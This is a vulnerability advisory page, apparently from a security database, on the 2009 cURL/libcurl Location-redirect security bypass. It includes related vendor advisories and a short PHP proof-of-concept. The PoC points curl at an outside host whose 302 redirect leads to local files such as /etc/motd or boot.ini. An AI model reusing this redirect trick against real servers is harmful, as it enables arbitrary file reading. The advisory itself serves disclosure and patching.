cURL/libcURL HTTP Location:重新定向绕过安全限制漏洞

🗓️ 05 Mar 2009 00:00:00Reported by RootType

cURL/libcURL HTTP Location: Security Bypass Vulnerabilit

Reporter	Title	Published	Views	Family All 109
FreeBSD	curl -- cURL/libcURL Location: Redirect URLs Security Bypass	3 Mar 200900:00	–	freebsd
ALT Linux	Security fix for the ALT Linux 6 package curl version 7.19.4-alt1	3 Mar 200900:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 8 package curl version 7.19.4-alt1	3 Mar 200900:00	–	altlinux
Tenable Nessus	CentOS 3 / 4 : curl (CESA-2009:0341)	20 Mar 200900:00	–	nessus
Tenable Nessus	Debian DSA-1738-1 : curl - arbitrary file access	12 Mar 200900:00	–	nessus
Tenable Nessus	Fedora 10 : curl-7.19.4-1.fc10 (2009-2247)	23 Apr 200900:00	–	nessus
Tenable Nessus	Fedora 9 : curl-7.19.4-1.fc9 (2009-2265)	6 Mar 200900:00	–	nessus
Tenable Nessus	FreeBSD : curl -- cURL/libcURL Location: Redirect URLs Security Bypass (5d433534-f41c-402e-ade5-e0a2259a7cb6)	5 Mar 200900:00	–	nessus
Tenable Nessus	GLSA-200903-21 : cURL: Arbitrary file access	10 Mar 200900:00	–	nessus
Tenable Nessus	HP System Management Homepage < 7.0 Multiple Vulnerabilities	20 Apr 201200:00	–	nessus


                                                &lt;?php
// This is an example of a vulnerable peice of PHP code
// If libcurl uses CURLOPT_FOLLOWLOCATION it could lead
// to arbitrary file access.
// The malicious redirect on withdk.com looks like this
// in .htaccess:
// # for Linux
// redirect 302 /test file:///etc/motd
// # for Win32
// redirect 302 /test file:///c:\boot.ini
// print_r ( curl_version() );
$c = new cc;
$c-&gt;fetch('http://withdk.com/malicious-redirect');
class cc {
function fetch($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$result1 = curl_exec($ch);
echo $result1;
curl_close($ch);
}
}
?&gt;

05 Mar 2009 00:00Current

8.2High risk

Vulners AI Score8.2

EPSS0.09919